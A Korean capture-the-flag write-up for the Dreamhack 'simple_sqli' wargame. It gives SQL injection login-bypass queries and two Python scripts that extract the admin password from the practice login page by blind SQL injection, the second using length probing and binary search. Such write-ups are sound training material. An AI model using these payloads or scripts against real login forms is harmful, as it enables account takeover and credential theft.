[Dreamhack Wargame] Simple_sqli + blind SQLI 스크립트

• 일반 풀이

SELECT * FROM users WHERE userid="admin"-- " AND userpassword="DUMMY"
SELECT * FROM users WHERE userid="admin" or "1" AND userpassword="DUMMY"
SELECT * FROM users WHERE userid="" or 1 LIMIT 1,1-- " AND userpassword="DUMMY"

• 파이썬 스크립트 이용한 blind SQLI 풀이

import requests
import string

url = 'http://host3.dreamhack.games:18628/login'
data = {
    'userid': '',
    'userpassword': ''
}
payload = 'admin" and substr(userpassword,{idx},1)=="{x}" --'
digits = string.digits + 'abcdef'
admin_pw = ''

for i in range(1,33):
    for ch in digits:
        data['userid'] = payload.format(idx=i, x=ch)
        c = requests.post(url, data=data)
        if 'hello' in c.text:
            admin_pw += ch
            print(admin_pw)
            break

사실 이 코드도 아래 소스코드를 보고 자릿수/포맷 파악했기에 완전한 blind SQLI라 할 수 없다

db.execute(f'insert into users(userid, userpassword) values ("guest", "guest"), ("admin", "{binascii.hexlify(os.urandom(16)).decode("utf8")}");')

 

• 개선된 blind SQLI python script 코드

import requests
import string

url = 'http://host3.dreamhack.games:11937/login'
data = {
    'userid': '',
    'userpassword': ''
}

pay = 'admin" and length(userpassword)<={len} --'
len = 1
while True:
    data['userid'] = pay.format(len=len)
    c = requests.post(url, data=data)
    if 'hello' in c.text:
        print(len)
        break
    len += 1


def find_digit(idx, l, h):
    while l<h:
        m = (l+h+1)//2 # l+1 = h인 케이스 위해
        data['userid'] = 'admin" and substr(userpassword,{idx},1) < CHAR({x}) --'.format(idx=idx, x=m)
        c = requests.post(url, data=data)
        if 'hello' in c.text:
            h = m-1
        else:
            l = m
    return l

admin_pw = ''
for i in range(1,len+1):
    # printable ascii characters 0x20~0x7f
    admin_pw += chr(find_digit(i, 32, 127))
    print(admin_pw)